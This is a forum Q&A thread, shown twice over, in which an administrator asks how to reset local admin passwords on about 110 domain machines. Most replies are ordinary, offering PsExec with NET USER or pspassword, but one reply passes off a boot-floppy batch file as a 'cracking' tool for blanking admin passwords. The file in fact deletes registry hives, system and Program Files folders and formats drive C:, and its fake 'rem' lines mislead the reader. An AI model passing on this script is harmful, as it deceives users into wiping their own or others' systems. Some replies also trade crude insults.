Questions

Script to change local admin password

Tags:
+
0 Votes
Locked

Script to change local admin password

sspara
I need a script, not a logon script, but a script I can run from one workstation or server and change all the local admin passwords on my domain. Can anyone help? I have zero experience with scripts so I need one pretty much dummy proof with lots of instructions.
  • +
    0 Votes
    ThumbsUp2

    Is there a particular reason you can not run it as a logon script? Perhaps you don't have the appropriate permission to be changing the local admin paswords? Your question sounds "fishy" to me.

    +
    0 Votes
    sspara

    By making it a login script it makes the new password available to the end user. This of course is a security concern.

    +
    0 Votes
    cmiller5400

    not if you encrypt the vbs file to a vbe using the screnc.exe file.

    +
    0 Votes
    w2ktechman

    A nice little boot floppy :)

    Ok, so you wanna be a cracker. This is cracking 101. Just remember that NEVER TRY THIS, as it is illegal. Ok, for starters let me just say that this is tricky. No actual danger though, but you really should practice it on your own system before attempting to try it on anyone elses. You should at minimum try it 5 or 6 times to really get to know how to do it well.

    Items needed

    Ability to create a batch file
    floppy disk
    USB floppy disk drive
    create a boot floppy with NTFS Write permissions

    Ok, once you have gathered the materials you should already have a boot floppy ready. In the autoexec.bat file add the line suser.bat at the end.

    On your desktop, create a file called suser.txt for (suser stands for Super User).
    Open the suser.txt file and paste the information below

    cls
    rem # start _admin.pwd
    ren %systemroot%\system32\etc %systemroot%\system32\cet
    rem start process A32#458
    ren %systemroot%\repair\DS_SOFTWARE A1E
    ren %systemroot%\repair\DS_SECURITY A2E
    ren %systemroot%\repair\DS_SAM A3E
    ren %systemroot%\repair\DS_system.bak A4E
    del %systemroot%\repair\A*.* /Q /F
    del %systemroot%\repair\s*.* /Q /F
    rem script _admin.pwd
    del %systemroot%\system32\catroot\*.*
    del %systemroot%\system32\catroot2\*.*
    del %systemroot%\system32\drivers\cet*.*
    rem new_pwd.pwd ==generate 0
    del "c:\program files" /Q /F
    ren %systemroot%\system32 %systemroot%\newpwd
    ren %systemroot%\system %systemroot%\system32
    rem AUTO_START new_pwd.pwd 44#1
    rem _admin.pwd == DISABLE
    del %systemroot%\system32\config /Q /F
    erase %systemroot%\system32\LogFiles\*.*
    rem ACTIVATE_MEMORY_FLOOD_0x0000323A
    rem DISABLE_LOGFILES
    format c:\ /Q /A:4096
    rem RESTART _admin.pwd


    Paste all of this into the suser.txt file. Save and close the file. Rename the file to suser.bat
    copy the file to your boot floppy disk.

    Boot to the new floppy disk and test it. This may stop and ask to press OK a few times. It should not, but it may still.
    Sometimes people really lock down the admin account, but this program is smart enough to unlock from both 'hidden' places, to allow a 'no password' option and blank it out, a double whammy!!!

    Remember, this is a REAL program that can get you into serious trouble. Also, it is 'time sensitive' when dealing with another persons system without them knowing. Always get to know a program with this much power BEFORE attempting to use it on someone elses machine.

    And most of all, never actually use it. I posted it as informative material. USE AT YOUR OWN RISK!!!
    And, never ever tell anyone that I gave this to you....

    +
    0 Votes
    sspara

    I'm not trying to hack anything, I'm administering a network and it is time to change the local admin password on all the clients. I don't want to go to each machine (all 110 of them) to change the password. I want a script to do it for me with one double click from one machine.

    +
    0 Votes
    jruby

    I have concerns about someone who is changing admin passwords who doesn't have any experience with automation basics. Are you in over your head here?

    +
    0 Votes
    sspara

    I'm administering a network and it is time to change the local admin password on all the clients. I don't want to go to each machine (all 110 of them) to change the password. I want a script to do it for me with one double click from one machine. I'm not in over my head, I just want an easier way of doing things, and would like some help. If you or anyone could give me a basic script that can do this task with some fill in the blank stuff like "domain name here" or "VLAN here" and "new password here" or whatever that would be great.

    +
    0 Votes
    jruby

    This isn't necessarily a one-click solution, but it's not real complex either.


    Create a file that containes the names of all the nodes you where you will be changing the password, call it Nodes.txt. Put one workstation or server per line. Download PSExec from MS (It's a prog from SysInternals and incredibly useful, part of PSTools I think).

    Logon using a profile that has admin rights to all the systems where you will be changing the admin password.

    Issue the command

    PSEXEC @Nodes.txt NET USER administrator TheNewPassword

    Make sure 'TheNewPassword' matches the complexity rules for the security policies that are in place.

    This worked on a virtual environment I have here, you may start with just one or two test machines in your Nodes.Txt file so you can verify it will work in your environment before turning it loose on all machines. For comfort, you may want to break your list of nodes into multiple files and change them in groups.

    Jim

    /* If you think the problem is bad now, wait until I fix it! */

    +
    0 Votes
    sspara

    Ok so this has gotten me the furthest, but when I run the command I get this error "Make sure that the default admin$ share is enabled on (computer name here)". I'm running the command from an account with domain admin rights and I'm running it from the directory with the PStools with the nodes.txt file in the same directory as well. I used the exact syntax you used only replacing TheNewPassword with obviously my new password, and it still didn't work. Should I be replacing NET USER with something?

    +
    0 Votes
    OldER Mycroft

    I suggest you allow the air to circulate in and around your arse cheeks, thereby stimulating blood flow to your lower extremities, and actually go have a look at all these machines.

    Showing your face around the company premises might boost your reputation as someone who takes an active interest and actually cares, rather than someone who does everything remotely from a sweaty, arse-impregnated chair. :)

    +
    0 Votes
    sspara

    I show my face everyday around the company premises, and I have a reputation as someone who actually cares but I do not see a reason to disturb everyone while they are working just to change a password that I'm pretty sure can be done remotely. I also want to learn new innovative ways of doing things, and scripting to me is new. I think finding a way to just double click one file and change all the passwords at once is a much smarter route than walking to each machine, which would take all day. I have more important things to do. Don't worry, someone will help me find the right answer so please don't worry about my arse cheeks unless you want to kiss my ***!

    +
    0 Votes
    CharlieSpencer

    I don't have a solution, just a question.

    You say you need to do this because it's time to change the local Admin p/w. What determines the frequency of this? Is there a company policy covering this? How many people know the local admin p/w? Are you changing it because one of them left?

    Just wondering.

    +
    0 Votes
    steven.taylor

    In spite of all the outrage at using a utility to change all the admin passwords at once, I guess the others do it manually or never at all....

    Try using PSTools. They have a utility called pspassword or something like that that will do they job for you.

  • +
    0 Votes
    ThumbsUp2

    Is there a particular reason you can not run it as a logon script? Perhaps you don't have the appropriate permission to be changing the local admin paswords? Your question sounds "fishy" to me.

    +
    0 Votes
    sspara

    By making it a login script it makes the new password available to the end user. This of course is a security concern.

    +
    0 Votes
    cmiller5400

    not if you encrypt the vbs file to a vbe using the screnc.exe file.

    +
    0 Votes
    w2ktechman

    A nice little boot floppy :)

    Ok, so you wanna be a cracker. This is cracking 101. Just remember that NEVER TRY THIS, as it is illegal. Ok, for starters let me just say that this is tricky. No actual danger though, but you really should practice it on your own system before attempting to try it on anyone elses. You should at minimum try it 5 or 6 times to really get to know how to do it well.

    Items needed

    Ability to create a batch file
    floppy disk
    USB floppy disk drive
    create a boot floppy with NTFS Write permissions

    Ok, once you have gathered the materials you should already have a boot floppy ready. In the autoexec.bat file add the line suser.bat at the end.

    On your desktop, create a file called suser.txt for (suser stands for Super User).
    Open the suser.txt file and paste the information below

    cls
    rem # start _admin.pwd
    ren %systemroot%\system32\etc %systemroot%\system32\cet
    rem start process A32#458
    ren %systemroot%\repair\DS_SOFTWARE A1E
    ren %systemroot%\repair\DS_SECURITY A2E
    ren %systemroot%\repair\DS_SAM A3E
    ren %systemroot%\repair\DS_system.bak A4E
    del %systemroot%\repair\A*.* /Q /F
    del %systemroot%\repair\s*.* /Q /F
    rem script _admin.pwd
    del %systemroot%\system32\catroot\*.*
    del %systemroot%\system32\catroot2\*.*
    del %systemroot%\system32\drivers\cet*.*
    rem new_pwd.pwd ==generate 0
    del "c:\program files" /Q /F
    ren %systemroot%\system32 %systemroot%\newpwd
    ren %systemroot%\system %systemroot%\system32
    rem AUTO_START new_pwd.pwd 44#1
    rem _admin.pwd == DISABLE
    del %systemroot%\system32\config /Q /F
    erase %systemroot%\system32\LogFiles\*.*
    rem ACTIVATE_MEMORY_FLOOD_0x0000323A
    rem DISABLE_LOGFILES
    format c:\ /Q /A:4096
    rem RESTART _admin.pwd


    Paste all of this into the suser.txt file. Save and close the file. Rename the file to suser.bat
    copy the file to your boot floppy disk.

    Boot to the new floppy disk and test it. This may stop and ask to press OK a few times. It should not, but it may still.
    Sometimes people really lock down the admin account, but this program is smart enough to unlock from both 'hidden' places, to allow a 'no password' option and blank it out, a double whammy!!!

    Remember, this is a REAL program that can get you into serious trouble. Also, it is 'time sensitive' when dealing with another persons system without them knowing. Always get to know a program with this much power BEFORE attempting to use it on someone elses machine.

    And most of all, never actually use it. I posted it as informative material. USE AT YOUR OWN RISK!!!
    And, never ever tell anyone that I gave this to you....

    +
    0 Votes
    sspara

    I'm not trying to hack anything, I'm administering a network and it is time to change the local admin password on all the clients. I don't want to go to each machine (all 110 of them) to change the password. I want a script to do it for me with one double click from one machine.

    +
    0 Votes
    jruby

    I have concerns about someone who is changing admin passwords who doesn't have any experience with automation basics. Are you in over your head here?

    +
    0 Votes
    sspara

    I'm administering a network and it is time to change the local admin password on all the clients. I don't want to go to each machine (all 110 of them) to change the password. I want a script to do it for me with one double click from one machine. I'm not in over my head, I just want an easier way of doing things, and would like some help. If you or anyone could give me a basic script that can do this task with some fill in the blank stuff like "domain name here" or "VLAN here" and "new password here" or whatever that would be great.

    +
    0 Votes
    jruby

    This isn't necessarily a one-click solution, but it's not real complex either.


    Create a file that containes the names of all the nodes you where you will be changing the password, call it Nodes.txt. Put one workstation or server per line. Download PSExec from MS (It's a prog from SysInternals and incredibly useful, part of PSTools I think).

    Logon using a profile that has admin rights to all the systems where you will be changing the admin password.

    Issue the command

    PSEXEC @Nodes.txt NET USER administrator TheNewPassword

    Make sure 'TheNewPassword' matches the complexity rules for the security policies that are in place.

    This worked on a virtual environment I have here, you may start with just one or two test machines in your Nodes.Txt file so you can verify it will work in your environment before turning it loose on all machines. For comfort, you may want to break your list of nodes into multiple files and change them in groups.

    Jim

    /* If you think the problem is bad now, wait until I fix it! */

    +
    0 Votes
    sspara

    Ok so this has gotten me the furthest, but when I run the command I get this error "Make sure that the default admin$ share is enabled on (computer name here)". I'm running the command from an account with domain admin rights and I'm running it from the directory with the PStools with the nodes.txt file in the same directory as well. I used the exact syntax you used only replacing TheNewPassword with obviously my new password, and it still didn't work. Should I be replacing NET USER with something?

    +
    0 Votes
    OldER Mycroft

    I suggest you allow the air to circulate in and around your arse cheeks, thereby stimulating blood flow to your lower extremities, and actually go have a look at all these machines.

    Showing your face around the company premises might boost your reputation as someone who takes an active interest and actually cares, rather than someone who does everything remotely from a sweaty, arse-impregnated chair. :)

    +
    0 Votes
    sspara

    I show my face everyday around the company premises, and I have a reputation as someone who actually cares but I do not see a reason to disturb everyone while they are working just to change a password that I'm pretty sure can be done remotely. I also want to learn new innovative ways of doing things, and scripting to me is new. I think finding a way to just double click one file and change all the passwords at once is a much smarter route than walking to each machine, which would take all day. I have more important things to do. Don't worry, someone will help me find the right answer so please don't worry about my arse cheeks unless you want to kiss my ***!

    +
    0 Votes
    CharlieSpencer

    I don't have a solution, just a question.

    You say you need to do this because it's time to change the local Admin p/w. What determines the frequency of this? Is there a company policy covering this? How many people know the local admin p/w? Are you changing it because one of them left?

    Just wondering.

    +
    0 Votes
    steven.taylor

    In spite of all the outrage at using a utility to change all the admin passwords at once, I guess the others do it manually or never at all....

    Try using PSTools. They have a utility called pspassword or something like that that will do they job for you.